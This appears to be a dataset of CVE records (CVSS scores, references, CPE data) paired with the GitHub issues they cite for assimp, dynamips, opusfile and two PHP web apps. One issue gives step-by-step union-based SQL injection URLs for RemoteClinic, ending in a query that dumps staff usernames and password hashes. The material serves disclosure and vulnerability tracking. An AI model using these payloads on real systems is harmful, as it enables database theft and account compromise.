std::allocator<Assimp::Collada::InputChannel> >&, unsigned long, std::vector<unsigned long, std::allocator<unsigned long> > const&, Assimp::Collada::PrimitiveType) (/root/asan_assimp/bin/libassimp.so.5+0x960a35) #3 0x7ffff5ec3949 in Assimp::ColladaParser::ReadIndexData(pugi::xml_node&, Assimp::Collada::Mesh&) (/root/asan_assimp/bin/libassimp.so.5+0x95e949) #4 0x7ffff5ec0831 in Assimp::ColladaParser::ReadMesh(pugi::xml_node&, Assimp::Collada::Mesh&) (/root/asan_assimp/bin/libassimp.so.5+0x95b831) #5 0x7ffff5ec03d3 in Assimp::ColladaParser::ReadGeometry(pugi::xml_node&, Assimp::Collada::Mesh&) (/root/asan_assimp/bin/libassimp.so.5+0x95b3d3) #6 0x7ffff5ebfd2e in Assimp::ColladaParser::ReadGeometryLibrary(pugi::xml_node&) (/root/asan_assimp/bin/libassimp.so.5+0x95ad2e) #7 0x7ffff5eb00a0 in Assimp::ColladaParser::ReadStructure(pugi::xml_node&) (/root/asan_assimp/bin/libassimp.so.5+0x94b0a0) #8 0x7ffff5eafae1 in Assimp::ColladaParser::ReadContents(pugi::xml_node&) (/root/asan_assimp/bin/libassimp.so.5+0x94aae1) #9 0x7ffff5eadb28 in Assimp::ColladaParser::ColladaParser(Assimp::IOSystem*, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&) (/root/asan_assimp/bin/libassimp.so.5+0x948b28) #10 0x7ffff5e4f81d in Assimp::ColladaLoader::InternReadFile(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, aiScene*, Assimp::IOSystem*) (/root/asan_assimp/bin/libassimp.so.5+0x8ea81d) #11 0x7ffff5aeeb1f in Assimp::BaseImporter::ReadFile(Assimp::Importer*, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, Assimp::IOSystem*) (/root/asan_assimp/bin/libassimp.so.5+0x589b1f) #12 0x7ffff5b280f8 in Assimp::Importer::ReadFile(char const*, unsigned int) (/root/asan_assimp/bin/libassimp.so.5+0x5c30f8) #13 0x555555596937 in Assimp::Importer::ReadFile(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, unsigned int) (/root/assimp-master/bin/Asanassimp+0x42937) #14 0x55555559409e in ImportModel(ImportData const&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&) (/root/assimp-master/bin/Asanassimp+0x4009e) #15 0x55555559f0a7 in Assimp_Info(char const* const*, unsigned int) (/root/assimp-master/bin/Asanassimp+0x4b0a7) #16 0x555555593d30 in main (/root/assimp-master/bin/Asanassimp+0x3fd30) #17 0x7ffff50140b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2) #18 0x55555556c35d in _start (/root/assimp-master/bin/Asanassimp+0x1835d) 0x602000000230 is located 0 bytes inside of 8-byte region [0x602000000230,0x602000000238) freed by thread T0 here: #0 0x7ffff769e0c7 in operator delete(void*) ../../../../src/libsanitizer/asan/asan_new_delete.cpp:160 #1 0x7ffff5f12e93 in __gnu_cxx::new_allocator<pugi::xml_node>::deallocate(pugi::xml_node*, unsigned long) (/root/asan_assimp/bin/libassimp.so.5+0x9ade93) #2 0x7ffff5ef8f21 in std::allocator_traits<std::allocator<pugi::xml_node> >::deallocate(std::allocator<pugi::xml_node>&, pugi::xml_node*, unsigned long) (/root/asan_assimp/bin/libassimp.so.5+0x993f21) #3 0x7ffff5ee4c6f in std::_Vector_base<pugi::xml_node, std::allocator<pugi::xml_node> >::_M_deallocate(pugi::xml_node*, unsigned long) (/root/asan_assimp/bin/libassimp.so.5+0x97fc6f) #4 0x7ffff5ee5369 in void std::vector<pugi::xml_node, std::allocator<pugi::xml_node> >::_M_realloc_insert<pugi::xml_node const&>(__gnu_cxx::__normal_iterator<pugi::xml_node*, std::vector<pugi::xml_node, std::allocator<pugi::xml_node> > >, pugi::xml_node const&) (/root/asan_assimp/bin/libassimp.so.5+0x980369) #5 0x7ffff5ed6e2e in std::vector<pugi::xml_node, std::allocator<pugi::xml_node> >::push_back(pugi::xml_node const&) (/root/asan_assimp/bin/libassimp.so.5+0x971e2e) #6 0x7ffff5ed0ec0 in Assimp::XmlNodeIterator::collectChildrenPreOrder(pugi::xml_node&) (/root/asan_assimp/bin/libassimp.so.5+0x96bec0) #7 0x7ffff5ed1054 in Assimp::XmlNodeIterator::collectChildrenPreOrder(pugi::xml_node&) (/root/asan_assimp/bin/libassimp.so.5+0x96c054) #8 0x7ffff5ed0d12 in Assimp::XmlNodeIterator::XmlNodeIterator(pugi::xml_node&, Assimp::XmlNodeIterator::IterationMode) (/root/asan_assimp/bin/libassimp.so.5+0x96bd12) #9 0x7ffff5ec0af6 in Assimp::ColladaParser::ReadSource(pugi::xml_node&) (/root/asan_assimp/bin/libassimp.so.5+0x95baf6) #10 0x7ffff5ec06ff in Assimp::ColladaParser::ReadMesh(pugi::xml_node&, Assimp::Collada::Mesh&) (/root/asan_assimp/bin/libassimp.so.5+0x95b6ff) #11 0x7ffff5ec03d3 in Assimp::ColladaParser::ReadGeometry(pugi::xml_node&, Assimp::Collada::Mesh&) (/root/asan_assimp/bin/libassimp.so.5+0x95b3d3) #12 0x7ffff5ebfd2e in Assimp::ColladaParser::ReadGeometryLibrary(pugi::xml_node&) (/root/asan_assimp/bin/libassimp.so.5+0x95ad2e) #13 0x7ffff5eb00a0 in Assimp::ColladaParser::ReadStructure(pugi::xml_node&) (/root/asan_assimp/bin/libassimp.so.5+0x94b0a0) #14 0x7ffff5eafae1 in Assimp::ColladaParser::ReadContents(pugi::xml_node&) (/root/asan_assimp/bin/libassimp.so.5+0x94aae1) #15 0x7ffff5eadb28 in Assimp::ColladaParser::ColladaParser(Assimp::IOSystem*, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&) (/root/asan_assimp/bin/libassimp.so.5+0x948b28) #16 0x7ffff5e4f81d in Assimp::ColladaLoader::InternReadFile(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, aiScene*, Assimp::IOSystem*) (/root/asan_assimp/bin/libassimp.so.5+0x8ea81d) #17 0x7ffff5aeeb1f in Assimp::BaseImporter::ReadFile(Assimp::Importer*, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, Assimp::IOSystem*) (/root/asan_assimp/bin/libassimp.so.5+0x589b1f) #18 0x7ffff5b280f8 in Assimp::Importer::ReadFile(char const*, unsigned int) (/root/asan_assimp/bin/libassimp.so.5+0x5c30f8) #19 0x555555596937 in Assimp::Importer::ReadFile(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, unsigned int) (/root/assimp-master/bin/Asanassimp+0x42937) #20 0x55555559409e in ImportModel(ImportData const&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&) (/root/assimp-master/bin/Asanassimp+0x4009e) #21 0x55555559f0a7 in Assimp_Info(char const* const*, unsigned int) (/root/assimp-master/bin/Asanassimp+0x4b0a7) #22 0x555555593d30 in main (/root/assimp-master/bin/Asanassimp+0x3fd30) #23 0x7ffff50140b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2) previously allocated by thread T0 here: #0 0x7ffff769d5a7 in operator new(unsigned long) ../../../../src/libsanitizer/asan/asan_new_delete.cpp:99 #1 0x7ffff5f24b56 in __gnu_cxx::new_allocator<pugi::xml_node>::allocate(unsigned long, void const*) (/root/asan_assimp/bin/libassimp.so.5+0x9bfb56) #2 0x7ffff5f12efb in std::allocator_traits<std::allocator<pugi::xml_node> >::allocate(std::allocator<pugi::xml_node>&, unsigned long) (/root/asan_assimp/bin/libassimp.so.5+0x9adefb) #3 0x7ffff5ef9487 in std::_Vector_base<pugi::xml_node, std::allocator<pugi::xml_node> >::_M_allocate(unsigned long) (/root/asan_assimp/bin/libassimp.so.5+0x994487) #4 0x7ffff5ee50d4 in void std::vector<pugi::xml_node, std::allocator<pugi::xml_node> >::_M_realloc_insert<pugi::xml_node const&>(__gnu_cxx::__normal_iterator<pugi::xml_node*, std::vector<pugi::xml_node, std::allocator<pugi::xml_node> > >, pugi::xml_node const&) (/root/asan_assimp/bin/libassimp.so.5+0x9800d4) #5 0x7ffff5ed6e2e in std::vector<pugi::xml_node, std::allocator<pugi::xml_node> >::push_back(pugi::xml_node const&) (/root/asan_assimp/bin/libassimp.so.5+0x971e2e) #6 0x7ffff5ed0ec0 in Assimp::XmlNodeIterator::collectChildrenPreOrder(pugi::xml_node&) (/root/asan_assimp/bin/libassimp.so.5+0x96bec0) #7 0x7ffff5ed1054 in Assimp::XmlNodeIterator::collectChildrenPreOrder(pugi::xml_node&) (/root/asan_assimp/bin/libassimp.so.5+0x96c054) #8 0x7ffff5ed0d12 in Assimp::XmlNodeIterator::XmlNodeIterator(pugi::xml_node&, Assimp::XmlNodeIterator::IterationMode) (/root/asan_assimp/bin/libassimp.so.5+0x96bd12) #9 0x7ffff5ec0af6 in Assimp::ColladaParser::ReadSource(pugi::xml_node&) (/root/asan_assimp/bin/libassimp.so.5+0x95baf6) #10 0x7ffff5ec06ff in Assimp::ColladaParser::ReadMesh(pugi::xml_node&, Assimp::Collada::Mesh&) (/root/asan_assimp/bin/libassimp.so.5+0x95b6ff) #11 0x7ffff5ec03d3 in Assimp::ColladaParser::ReadGeometry(pugi::xml_node&, Assimp::Collada::Mesh&) (/root/asan_assimp/bin/libassimp.so.5+0x95b3d3) #12 0x7ffff5ebfd2e in Assimp::ColladaParser::ReadGeometryLibrary(pugi::xml_node&) (/root/asan_assimp/bin/libassimp.so.5+0x95ad2e) #13 0x7ffff5eb00a0 in Assimp::ColladaParser::ReadStructure(pugi::xml_node&) (/root/asan_assimp/bin/libassimp.so.5+0x94b0a0) #14 0x7ffff5eafae1 in Assimp::ColladaParser::ReadContents(pugi::xml_node&) (/root/asan_assimp/bin/libassimp.so.5+0x94aae1) #15 0x7ffff5eadb28 in Assimp::ColladaParser::ColladaParser(Assimp::IOSystem*, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&) (/root/asan_assimp/bin/libassimp.so.5+0x948b28) #16 0x7ffff5e4f81d in Assimp::ColladaLoader::InternReadFile(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, aiScene*, Assimp::IOSystem*) (/root/asan_assimp/bin/libassimp.so.5+0x8ea81d) #17 0x7ffff5aeeb1f in Assimp::BaseImporter::ReadFile(Assimp::Importer*, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, Assimp::IOSystem*) (/root/asan_assimp/bin/libassimp.so.5+0x589b1f) #18 0x7ffff5b280f8 in Assimp::Importer::ReadFile(char const*, unsigned int) (/root/asan_assimp/bin/libassimp.so.5+0x5c30f8) #19 0x555555596937 in Assimp::Importer::ReadFile(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, unsigned int) (/root/assimp-master/bin/Asanassimp+0x42937) #20 0x55555559409e in ImportModel(ImportData const&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&) (/root/assimp-master/bin/Asanassimp+0x4009e) #21 0x55555559f0a7 in Assimp_Info(char const* const*, unsigned int) (/root/assimp-master/bin/Asanassimp+0x4b0a7) #22 0x555555593d30 in main (/root/assimp-master/bin/Asanassimp+0x3fd30) #23 0x7ffff50140b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2) SUMMARY: AddressSanitizer: heap-use-after-free (/root/asan_assimp/bin/libassimp.so.5+0x961979) in Assimp::ColladaParser::ExtractDataObjectFromChannel(Assimp::Collada::InputChannel const&, unsigned long, Assimp::Collada::Mesh&) Shadow bytes around the buggy address: 0x0c047fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c047fff8000: fa fa 00 fa fa fa 00 fa fa fa fd fa fa fa 00 00 0x0c047fff8010: fa fa fd fa fa fa fd fd fa fa fd fa fa fa fd fd 0x0c047fff8020: fa fa fd fa fa fa fd fd fa fa fd fa fa fa fd fd 0x0c047fff8030: fa fa fd fa fa fa fd fd fa fa 00 04 fa fa fd fa =>0x0c047fff8040: fa fa fd fd fa fa[fd]fa fa fa fd fd fa fa fd fa 0x0c047fff8050: fa fa fd fd fa fa fd fa fa fa fd fd fa fa fa fa 0x0c047fff8060: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8070: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8080: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8090: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==19874==ABORTING ``` # Description ``` A heap-use-after-free was discovered in assimp. The issue is being triggered in function Assimp::ColladaParser::ExtractDataObjectFromChannel(Assimp::Collada::InputChannel const&, unsigned long, Assimp::Collada::Mesh&). ``` # Poc Poc file is [this](https://github.com/nisl-bugTest/Pocfiles/blob/main/fuzzing/assimp/issue4/Assimp__ColladaParser__ExtractDataObjectFromChannel_heap-use-after-free).
Bug: heap-use-after-free in function Assimp::ColladaParser::ExtractDataObjectFromChannel()
https://api.github.com/repos/assimp/assimp/issues/4286/comments
2
2021-12-23T14:24:41Z
2024-02-15T12:07:02Z
https://github.com/assimp/assimp/issues/4286
1,087,760,488
4,286
4,638
CVE-2022-47012
2023-01-20T19:15:17.390
Use of uninitialized variable in function gen_eth_recv in GNS3 dynamips 0.2.21.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/GNS3/dynamips/issues/125" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/GNS3/dynamips/issues/125" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:solarwinds:dynamips:0.2.21:*:*:*:*:*:*:*", "matchCriteriaId": "3456AE6A-A332-48C3-BC4F-F8741838E695", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "908" ]
908
https://github.com/GNS3/dynamips/issues/125
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "GNS3", "dynamips" ]
hello, I found a bug of use of uninitialized variable in the source code of dynamips , would you help me check if this bug is true?Thank you very much! here is an overview of bug occurrence. <img width="837" alt="1" src="https://user-images.githubusercontent.com/87304478/145379491-6e996e43-558d-4c40-96b2-816c6b420737.png"> **step1:** in file dynamips/common/rom2c.c , [line 100](https://github.com/GNS3/dynamips/blob/master/common/gen_eth.c#L100): call **pcap_next** and use its return value to compare with **pkt_ptr** **step2:** in file libpcap-1.8.1/pcap.c, line 238: **pkt** is declared here bug uninitialized. **step3:** in file libpcap-1.8.1/pcap.c, line 245: return uninitialized pointer **pkt** **step4**: in file dynamips/common/rom2c.c , [line 100](https://github.com/GNS3/dynamips/blob/master/common/gen_eth.c#L100): return value of pcap_next is used in the compare operation but not initialized
Use of uninitialized variable
https://api.github.com/repos/GNS3/dynamips/issues/125/comments
2
2021-12-09T10:38:24Z
2024-12-10T04:10:12Z
https://github.com/GNS3/dynamips/issues/125
1,075,417,468
125
4,639
CVE-2022-47021
2023-01-20T19:15:17.550
A null pointer dereference issue was discovered in functions op_get_data and op_open1 in opusfile.c in xiph opusfile 0.9 thru 0.12 allows attackers to cause denial of service or other unspecified impacts.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/xiph/opusfile/commit/0a4cd796df5b030cb866f3f4a5e41a4b92caddf5" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/xiph/opusfile/issues/36" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/2ODIA6QRIRBNF2HRXOE5VCZ2AFP4ZB4R/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/4LIKBLOE433RA44YTYUZLED4IOWJG5DV/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ED4CWLBR2WQ2IXXTHZ24UYZBRNCLMJXH/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/MYPAQANM2ZNPXRBFOS5NFXNJ7O4Q3OBD/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/xiph/opusfile/commit/0a4cd796df5b030cb866f3f4a5e41a4b92caddf5" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/xiph/opusfile/issues/36" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/2ODIA6QRIRBNF2HRXOE5VCZ2AFP4ZB4R/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/4LIKBLOE433RA44YTYUZLED4IOWJG5DV/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ED4CWLBR2WQ2IXXTHZ24UYZBRNCLMJXH/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/MYPAQANM2ZNPXRBFOS5NFXNJ7O4Q3OBD/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:xiph:opusfile:*:*:*:*:*:*:*:*", "matchCriteriaId": "246E2C12-AD8B-42AA-9838-8A83E4A3A068", "versionEndExcluding": null, "versionEndIncluding": "0.12", "versionStartExcluding": null, "versionStartIncluding": "0.9", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:fedoraproject:fedora:36:*:*:*:*:*:*:*", "matchCriteriaId": "5C675112-476C-4D7C-BCB9-A2FB2D0BC9FD", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:fedoraproject:fedora:37:*:*:*:*:*:*:*", "matchCriteriaId": "E30D0E6F-4AE8-4284-8716-991DFA48CC5D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/xiph/opusfile/issues/36
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "xiph", "opusfile" ]
Hi, I found a potential null pointer dereference bug in the project source code of opusfile, and I have shown the execution sequence of the program that may generate the bug on the graph below. The red text illustrates the steps that generate the bug, the red arrows represent the control flow,the file path can be seen in the blue framed section. ![image](https://user-images.githubusercontent.com/87304478/188381342-12a4a003-a097-4c8d-9025-dc2194a80751.png) Although the code shown is for version 0.9 but is still exist in current version https://github.com/xiph/opusfile/blob/cf218fb54929a1f54e30e2cb208a22d08b08c889/src/opusfile.c#L1527-L1532 would you can help to check if this bug is true?thank you for your effort and patience!
A potential bug of NPD
https://api.github.com/repos/xiph/opusfile/issues/36/comments
4
2022-09-05T06:45:33Z
2025-04-06T19:35:02Z
https://github.com/xiph/opusfile/issues/36
1,361,478,689
36
4,640
CVE-2022-48120
2023-01-20T19:15:17.667
SQL Injection vulnerability in kishan0725 Hospital Management System thru commit 4770d740f2512693ef8fd9aa10a8d17f79fad9bd (on March 13, 2021), allows attackers to execute arbitrary commands via the contact and doctor parameters to /search.php.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/kishan0725/Hospital-Management-System/issues/32" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/kishan0725/Hospital-Management-System/issues/32" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:hospital_management_system_project:hospital_management_system:*:*:*:*:*:*:*:*", "matchCriteriaId": "5E201779-239D-485F-B17B-E64237D71686", "versionEndExcluding": null, "versionEndIncluding": "2021-03-13", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/kishan0725/Hospital-Management-System/issues/32
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "kishan0725", "Hospital-Management-System" ]
![image](https://user-images.githubusercontent.com/36843585/209433116-64a4a392-04ef-476f-848e-79f15af0ed9a.png) ![image](https://user-images.githubusercontent.com/36843585/209433125-ccd55e5d-74e9-4b76-9c34-9730cbc6d0dd.png) in this code. ![image](https://user-images.githubusercontent.com/36843585/209433150-b0b62079-1f92-4865-8c45-69293a3ea2e8.png)
in search.php has sql injection
https://api.github.com/repos/kishan0725/Hospital-Management-System/issues/32/comments
0
2022-12-24T11:10:14Z
2022-12-24T11:10:14Z
https://github.com/kishan0725/Hospital-Management-System/issues/32
1,510,052,619
32
4,641
CVE-2022-48152
2023-01-20T19:15:17.727
SQL Injection vulnerability in RemoteClinic 2.0 allows attackers to execute arbitrary commands and gain sensitive information via the id parameter to /medicines/profile.php.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/remoteclinic/RemoteClinic/issues/20" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/remoteclinic/RemoteClinic/issues/20" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:remoteclinic:remote_clinic:2.0:*:*:*:*:*:*:*", "matchCriteriaId": "E545F721-A065-4091-8405-9B92071E1A44", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/remoteclinic/RemoteClinic/issues/20
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "remoteclinic", "RemoteClinic" ]
#### Vulnerability Description: SQL injection (SQLi) refers to an injection attack wherein an attacker can execute malicious SQL statements that control a web application's database server. Vulnerable Endpoint: http://localhost/RemoteClinic/medicines/profile.php?id=30 (My Medicine Profile ID is **30**) #### Steps to Reproduce: 1. Login in Application as Doctor. 2. Click on Directory. ![Click on Directory](https://user-images.githubusercontent.com/81484562/209584034-5a37238e-211f-4d25-af50-83c3932ad4bc.png) 3. Click on any medicine profile. ![Click on any medicine profile](https://user-images.githubusercontent.com/81484562/209584080-1f101835-3575-477a-8ea2-162cffa94ce1.png) 4. Now PUT single quote in medicine profile endpoint. ![single quote](https://user-images.githubusercontent.com/81484562/209584098-e30d6715-65da-41c1-9848-8a69a381fe66.png) 5. Balance the Query to Remove Errors. **Full URL**: http://localhost/RemoteClinic/medicines/profile.php?id=30%27--%20- ![Balance](https://user-images.githubusercontent.com/81484562/209584334-49491efb-de59-4e26-9286-72246688fdd6.png) 6. Find Total Numbers of Columns. **Full URL**: http://localhost/RemoteClinic/medicines/profile.php?id=30%27%20order%20by%207--%20- ![Total Columns](https://user-images.githubusercontent.com/81484562/209584352-e288102d-9d03-4ff3-a9f4-13825d45d878.png) 7. Find Vulnerable Columns. **Full URL**: http://localhost/RemoteClinic/medicines/profile.php?id=-30%27%20union%20select%201,2,3,4,5,6,7--%20- ![Vulnerable Columns](https://user-images.githubusercontent.com/81484562/209584367-632a82a7-abb8-4c33-9761-e3fbd85eae0b.png) 8. Now Extract **Current Database** and **Current User**. **Full URL**: http://localhost/RemoteClinic/medicines/profile.php?id=-30%27%20union%20select%20database(),user(),3,4,5,6,7--%20- ![db and user](https://user-images.githubusercontent.com/81484562/209584375-d8589575-79e2-4b09-a8ba-6f72ff954b84.png) 9. Extract All **Users** and **Passwords** (md5 hash). **Full URL**: http://localhost/RemoteClinic/medicines/profile.php?id=-30%27%20union%20select%20group_concat(userid,0x3a,passkey,0x0a),2,3,4,5,6,7%20from%20p_staff_dir--%20- ![users and passwords](https://user-images.githubusercontent.com/81484562/209584391-cec06f13-26f7-4b16-b7bc-d27ad3be4e5d.png) #### Impact: An attacker can use SQL injection to bypass a web application's authentication and authorization mechanisms and retrieve the contents of an entire database. SQLi can also be used to add, modify and delete records in a database, affecting data integrity. Under the right circumstances, SQLi can also be used by an attacker to execute OS commands, which may then be used to escalate an attack even further.
SQL Injection in /medicines/profile.php via `id` parameter
https://api.github.com/repos/remoteclinic/RemoteClinic/issues/20/comments
1
2022-12-26T22:39:19Z
2023-01-27T17:13:38Z
https://github.com/remoteclinic/RemoteClinic/issues/20
1,511,290,645
20
4,642
CVE-2023-23010
2023-01-20T19:15:18.010
Cross Site Scripting (XSS) vulnerability in Ecommerce-CodeIgniter-Bootstrap thru commit d5904379ca55014c5df34c67deda982c73dc7fe5 (on Dec 27, 2022), allows attackers to execute arbitrary code via the languages and trans_load parameters in file add_product.php.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
